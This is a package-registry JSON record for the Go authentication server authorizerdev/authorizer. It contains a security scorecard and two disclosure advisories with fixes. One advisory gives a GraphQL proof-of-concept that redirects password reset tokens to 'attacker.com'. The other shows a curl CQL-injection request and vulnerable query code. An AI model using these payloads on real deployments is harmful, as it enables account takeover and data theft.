{"id":4202844,"name":"github.com/authorizerdev/authorizer","ecosystem":"go","description":"","homepage":"https://github.com/authorizerdev/authorizer","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/authorizerdev/authorizer","keywords_array":[],"namespace":"github.com/authorizerdev","versions_count":15,"first_release_published_at":"2026-03-31T14:24:27.000Z","latest_release_published_at":"2026-04-12T05:56:45.000Z","latest_release_number":"v0.0.0-20260412055645-1726717485db","last_synced_at":"2026-04-19T14:10:42.428Z","created_at":"2022-04-12T20:43:29.041Z","updated_at":"2026-04-20T06:11:01.856Z","registry_url":"https://pkg.go.dev/github.com/authorizerdev/authorizer","install_command":"go get github.com/authorizerdev/authorizer","documentation_url":"https://pkg.go.dev/github.com/authorizerdev/authorizer#section-documentation","metadata":{},"repo_metadata":{"id":37384864,"uuid":"373163805","full_name":"authorizerdev/authorizer","owner":"authorizerdev","description":"Your data, your control. Fully open source, authentication and authorization. No lock-ins.  Deployment in Railway in 120 seconds || Spin a docker image as a micro-service in your infra. Built in login page and Admin panel out of the box.","archived":false,"fork":false,"pushed_at":"2026-04-06T06:00:07.000Z","size":84115,"stargazers_count":1949,"open_issues_count":110,"forks_count":204,"subscribers_count":16,"default_branch":"main","last_synced_at":"2026-04-06T08:11:15.210Z","etag":null,"topics":["2fa","auth","authentication","authorization","docker","golang","graphdb","graphql","hacktoberfest","magic-link","microservice","nosql","oauth2","role-based-access-control","security","social-logins","sql","typescript","user-privileges"],"latest_commit_sha":null,"homepage":"https://authorizer.dev","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/authorizerdev.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":"ROADMAP_V2.md","authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":"authorizerdev"}},"created_at":"2021-06-02T12:42:07.000Z","updated_at":"2026-04-06T06:00:12.000Z","dependencies_parsed_at":"2023-10-25T20:33:47.340Z","dependency_job_id":"2919dfc9-f444-4b05-8f15-59f61c03735c","html_url":"https://github.com/authorizerdev/authorizer","commit_stats":{"total_commits":911,"total_committers":38,"mean_commits":"23.973684210526315","dds":0.2085620197585072,"last_synced_commit":"10e9d8cb1962b1b405e07035a0cf05e9da3dd989"},"previous_names":[],"tags_count":284,"template":false,"template_full_name":null,"purl":"pkg:github/authorizerdev/authorizer","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/authorizerdev","download_url":"https://codeload.github.com/authorizerdev/authorizer/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer/sbom","scorecard":{"id":217111,"data":{"date":"2025-08-11","repo":{"name":"github.com/authorizerdev/authorizer","commit":"8bd75a8fd3ae0003f7c0ff97bf3746844faa99b6"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":3.4,"checks":[{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":5,"reason":"Found 6/12 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/release.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:25: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yaml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:78: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yaml:95: update your workflow using https://app.stepsecurity.io/secureworkflow/authorizerdev/authorizer/release.yaml/main?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1","Warn: containerImage not pinned by hash: Dockerfile:14","Warn: containerImage not pinned by hash: Dockerfile:23: pin your Docker image by updating alpine:3.18 to alpine:3.18@sha256:de0eb0b3f2a47ba1eb89389859a9bd88b28e82f5826b6969ad604979713c2d4f","Warn: goCommand not pinned by hash: .github/workflows/release.yaml:57","Info:   0 out of   3 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   5 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yaml:21"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact 1.4.4 not signed: https://api.github.com/repos/authorizerdev/authorizer/releases/171769331","Warn: release artifact 1.4.3 not signed: https://api.github.com/repos/authorizerdev/authorizer/releases/154699321","Warn: release artifact 1.4.2 not signed: https://api.github.com/repos/authorizerdev/authorizer/releases/153661032","Warn: release artifact 1.4.1 not signed: https://api.github.com/repos/authorizerdev/authorizer/releases/153657595","Warn: release artifact 1.4.0 not signed: https://api.github.com/repos/authorizerdev/authorizer/releases/149362479","Warn: release artifact 1.4.4 does not have provenance: https://api.github.com/repos/authorizerdev/authorizer/releases/171769331","Warn: release artifact 1.4.3 does not have provenance: https://api.github.com/repos/authorizerdev/authorizer/releases/154699321","Warn: release artifact 1.4.2 does not have provenance: https://api.github.com/repos/authorizerdev/authorizer/releases/153661032","Warn: release artifact 1.4.1 does not have provenance: https://api.github.com/repos/authorizerdev/authorizer/releases/153657595","Warn: release artifact 1.4.0 does not have provenance: https://api.github.com/repos/authorizerdev/authorizer/releases/149362479"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"22 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-fq5x-7292-2p5r","Warn: Project is vulnerable to: GO-2022-0635","Warn: Project is vulnerable to: GO-2022-0646","Warn: Project is vulnerable to: GO-2023-2334 / GHSA-2c7c-3mj9-8fqh","Warn: Project is vulnerable to: GO-2024-2631 / GHSA-c5q2-7r4c-mv6g","Warn: Project is vulnerable to: GO-2025-3485 / GHSA-c6gw-w398-hv78","Warn: Project is vulnerable to: GO-2025-3553 / GHSA-mh63-6h87-95cp","Warn: Project is vulnerable to: GO-2024-2567 / GHSA-fqpg-rq76-99pq","Warn: Project is vulnerable to: GO-2024-2606 / GHSA-mrww-27vc-gghv","Warn: Project is vulnerable to: GO-2025-3540","Warn: Project is vulnerable to: GO-2024-2920 / GHSA-2hmf-46v7-v6fx","Warn: Project is vulnerable to: GO-2024-3321 / GHSA-v778-237x-gjrc","Warn: Project is vulnerable to: GO-2025-3487 / GHSA-hcg3-q754-cr77","Warn: Project is vulnerable to: GO-2024-2687 / GHSA-4v7x-pqxf-cx7m","Warn: Project is vulnerable to: GO-2024-3333","Warn: Project is vulnerable to: GO-2025-3503 / GHSA-qxp5-gwg8-xv66","Warn: Project is vulnerable to: GO-2025-3595 / GHSA-vvgc-356p-c3xw","Warn: Project is vulnerable to: GO-2025-3488 / GHSA-6v2p-p543-phr9"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:51:50.548Z","repository_id":37384864,"created_at":"2025-08-17T01:51:50.549Z","updated_at":"2025-08-17T01:51:50.549Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31483586,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-06T17:22:55.647Z","status":"ssl_error","status_checked_at":"2026-04-06T17:22:54.741Z","response_time":112,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-04-06T18:11:16.806Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":1.621842380873635,"dependent_packages_count":6.491628958142286,"stargazers_count":null,"forks_count":null,"average":4.056735669507961},"purl":"pkg:golang/github.com/authorizerdev/authorizer","advisories":[{"uuid":"GSA_kwCzR0hTQS14M2Y0LXY4M2YtN3dwMs4ABUyk","url":"https://github.com/advisories/GHSA-x3f4-v83f-7wp2","title":"Authorizer: Password reset token theft and full auth token redirect via unvalidated redirect_uri","description":"Hi,\n\nI found that 6 endpoints in Authorizer accept a user-controlled `redirect_uri` and append sensitive tokens to it without validating the URL against `AllowedOrigins`. The OAuth `/app` handler validates redirect_uri at `http_handlers/app.go:46`, but the GraphQL mutations and verify_email handler skip validation entirely. An attacker can steal password reset tokens, magic link tokens, and full auth sessions (access_token + id_token + refresh_token) by pointing redirect_uri to their server. Verified against HEAD (commit 73679fa).\n\n## Affected Endpoints\n\n1. **ForgotPassword** (`internal/graphql/forgot_password.go:76-77`) - password reset tokens\n2. **MagicLinkLogin** (`internal/graphql/magic_link_login.go:150-151`) - magic link auth tokens\n3. **Signup** (`internal/graphql/signup.go:211-212`) - email verification tokens\n4. **InviteMembers** (`internal/graphql/invite_members.go:90-91`) - invitation tokens\n5. **OAuthLoginHandler** (`internal/http_handlers/oauth_login.go:18-20`) - OAuth redirect stored in state\n6. **VerifyEmailHandler** (`internal/http_handlers/verify_email.go:27,178`) - full auth tokens (access + id + refresh)\n\n## Root Cause\n\nBecause these 6 endpoints completely lack the `validators.IsValidOrigin()` check, this vulnerability bypasses secure configurations. Even if a production administrator strictly configures `AllowedOrigins` to `[\"https://my-secure-app.com\"]`, an attacker can still steal tokens by passing `https://attacker.com` to these specific GraphQL mutations. The validation only exists in the `/app` OAuth handler, not in any of the GraphQL mutations.\n\nIn `forgot_password.go:76-77`, the user-supplied `redirect_uri` is accepted without validation:\n\n    if strings.TrimSpace(refs.StringValue(params.RedirectURI)) != \"\" {\n        redirectURI = refs.StringValue(params.RedirectURI)\n    }\n\nThe reset token is appended to this URL at `internal/utils/common.go:77`:\n\n    func GetForgotPasswordURL(token, redirectURI string) string {\n        verificationURL := redirectURI + \"?token=\" + token\n        return verificationURL\n    }\n\nCompare with the OAuth flow at `internal/http_handlers/app.go:46` which validates correctly:\n\n    if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {\n        c.JSON(400, gin.H{\"error\": \"invalid redirect url\"})\n        return\n    }\n\nThis validation is missing from all 6 endpoints listed above.\n\n## Most Severe Path: Full Token Theft via verify_email\n\nAfter a user clicks the verification link, `verify_email.go:178` generates full auth tokens and redirects to the (unvalidated) URL:\n\n    params := \"access_token=\" + authToken.AccessToken.Token +\n        \"\u0026token_type=bearer\u0026expires_in=\" + ... +\n        \"\u0026id_token=\" + authToken.IDToken.Token + \"\u0026nonce=\" + nonce\n\nThe redirect_uri is stored in the JWT claim from the original request (attacker-controlled). The attacker receives the victim's access_token, id_token, and refresh_token directly.\n\nBecause tokens are appended as URL query parameters, they are also automatically leaked to the attacker's server access logs, the victim's browser history, and any third-party analytics scripts on the attacker's page via the `Referer` header.\n\n## PoC\n\n    mutation {\n      forgot_password(params: {\n        email: \"victim@example.com\"\n        redirect_uri: \"https://attacker.com/steal\"\n      }) {\n        message\n      }\n    }\n\nThe victim receives a legitimate password reset email with the link `https://attacker.com/steal?token=\u003creset_token\u003e`. Clicking the link sends the reset token to the attacker.\n\n## Impact\n\n- Account takeover via stolen password reset tokens\n- Full session theft via stolen access_token + id_token + refresh_token\n- Passwordless account compromise via stolen magic link tokens\n- No authentication required to trigger (the GraphQL mutations are public)\n- Victim only needs to click the email link from their trusted Authorizer instance\n\n## Additional Note\n\nThe default `AllowedOrigins` at `cmd/root.go:39` is `[\"*\"]`, so even the OAuth endpoint's validation is a no-op by default. Recommend changing the default to require explicit configuration.\n\nKoda Reef","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-06T17:59:27.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/authorizerdev/authorizer/security/advisories/GHSA-x3f4-v83f-7wp2","https://github.com/authorizerdev/authorizer/pull/502","https://github.com/authorizerdev/authorizer/commit/6d9bef1aaba3f867f8c769b93eb7fc80e4e7b0a2","https://github.com/authorizerdev/authorizer/releases/tag/2.0.1","https://github.com/advisories/GHSA-x3f4-v83f-7wp2"],"source_kind":"github","identifiers":["GHSA-x3f4-v83f-7wp2"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-06T18:00:10.375Z","updated_at":"2026-04-20T06:00:26.962Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M2Y0LXY4M2YtN3dwMs4ABUyk","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14M2Y0LXY4M2YtN3dwMs4ABUyk","packages":[{"ecosystem":"go","package_name":"github.com/authorizerdev/authorizer","versions":[{"first_patched_version":"0.0.0-20260329085140-6d9bef1aaba3","vulnerable_version_range":"\u003c 0.0.0-20260329085140-6d9bef1aaba3"}],"purl":"pkg:go/github.com%2Fauthorizerdev%2Fauthorizer"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M2Y0LXY4M2YtN3dwMs4ABUyk/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qZndnLXJ4ZjMtcDdyOc4ABUyj","url":"https://github.com/advisories/GHSA-jfwg-rxf3-p7r9","title":"Authorizer: CQL/N1QL Injection in Cassandra and Couchbase Backends via fmt.Sprintf String Interpolation","description":"## Vulnerability Details\n\n**CWE:** CWE-943 - Improper Neutralization of Special Elements in Data Query Logic\n\nAll 66+ CQL queries in `internal/storage/db/cassandradb/` use `fmt.Sprintf` to interpolate user-controlled values directly into CQL query strings without parameterization.\n\nUnauthenticated endpoints (`signup`, `login`, `forgot_password`, `magic_link_login`) pass user input directly into CQL query strings.\n\n**Note:** This advisory covers the Cassandra CQL injection only. The Couchbase N1QL injection is tracked in a separate advisory per CVE rule 4.2.11.\n\n## Affected Code Pattern\n\n```go\n// Before (VULNERABLE) - e.g. cassandradb/user.go\nquery := fmt.Sprintf(\"SELECT ... FROM %s WHERE email = '%s'\", table, email)\nerr := p.db.Query(query).Scan(...)\n```\n\n## Steps to Reproduce\n\n1. Deploy Authorizer \u003c= 2.0.0 with Cassandra backend\n2. Send a signup request with a CQL injection payload in the email field:\n\n```bash\ncurl -X POST http://localhost:8080/graphql \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"query\":\"mutation { signup(params: { email: \\\"test'\\\" }) { message } }\"}'\n```\n\n3. The single quote breaks out of the CQL string literal, causing a CQL parse error that leaks internal schema information\n4. Crafted payloads can manipulate query logic to bypass authentication or extract data\n\n## Affected Files (10 Cassandra files)\n\n| Package | File | Queries Fixed |\n|---------|------|--------------|\n| cassandradb | user.go | 7 |\n| cassandradb | otp.go | 4 |\n| cassandradb | session_token.go | 19 |\n| cassandradb | verification_requests.go | 4 |\n| cassandradb | authenticator.go | 3 |\n| cassandradb | email_template.go | 5 |\n| cassandradb | webhook.go | 5 |\n| cassandradb | webhook_log.go | 2 |\n| cassandradb | session.go | 1 |\n| cassandradb | env.go | 2 |\n\n## Impact\n\nAn unauthenticated attacker can inject arbitrary CQL operators through the email, phone, or token parameters on public-facing endpoints (signup, login, forgot_password, magic_link_login). This enables authentication bypass and data exfiltration from the Cassandra keyspace.\n\n## Proposed Fix\n\nUse parameterized queries:\n\n```go\n// After (FIXED)\nquery := fmt.Sprintf(\"SELECT ... FROM %s WHERE email = ?\", table)\nerr := p.db.Query(query, email).Scan(...)\n```\n\nFixed in https://github.com/authorizerdev/authorizer/pull/500 (merged 2026-03-27).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-06T17:56:31.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/authorizerdev/authorizer/security/advisories/GHSA-jfwg-rxf3-p7r9","https://github.com/authorizerdev/authorizer/pull/500","https://github.com/authorizerdev/authorizer/commit/73679faa53cd215c7524d651046e402c43809786","https://github.com/authorizerdev/authorizer/releases/tag/2.0.1","https://github.com/advisories/GHSA-jfwg-rxf3-p7r9"],"source_kind":"github","identifiers":["GHSA-jfwg-rxf3-p7r9"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-06T18:00:10.375Z","updated_at":"2026-04-20T06:00:26.963Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZndnLXJ4ZjMtcDdyOc4ABUyj","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qZndnLXJ4ZjMtcDdyOc4ABUyj","packages":[{"ecosystem":"go","package_name":"github.com/authorizerdev/authorizer","versions":[{"first_patched_version":"0.0.0-20260327055742-73679faa53cd","vulnerable_version_range":"\u003c 0.0.0-20260327055742-73679faa53cd"}],"purl":"pkg:go/github.com%2Fauthorizerdev%2Fauthorizer"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qZndnLXJ4ZjMtcDdyOc4ABUyj/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/authorizerdev/authorizer","docker_dependents_count":1,"docker_downloads_count":18,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/authorizerdev/authorizer","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/authorizerdev/authorizer/dependencies","status":null,"funding_links":["https://github.com/sponsors/authorizerdev"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-06T08:01:15.161Z","issues_count":113,"pull_requests_count":87,"avg_time_to_close_issue":5276499.06779661,"avg_time_to_close_pull_request":837263.8846153846,"issues_closed_count":59,"pull_requests_closed_count":78,"pull_request_authors_count":26,"issue_authors_count":65,"avg_comments_per_issue":2.5132743362831858,"avg_comments_per_pull_request":0.5747126436781609,"merged_pull_requests_count":75,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":2,"past_year_pull_requests_count":4,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":1205249.0,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":2,"past_year_pull_request_authors_count":2,"past_year_issue_authors_count":2,"past_year_avg_comments_per_issue":0.0,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":2,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authorizerdev%2Fauthorizer/issues","maintainers":[{"login":"anik-ghosh-au7","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anik-ghosh-au7"},{"login":"samyakbhuta","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samyakbhuta"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthorizerdev%2Fauthorizer/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthorizerdev%2Fauthorizer/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthorizerdev%2Fauthorizer/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthorizerdev%2Fauthorizer/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fauthorizerdev%2Fauthorizer/codemeta","maintainers":[]}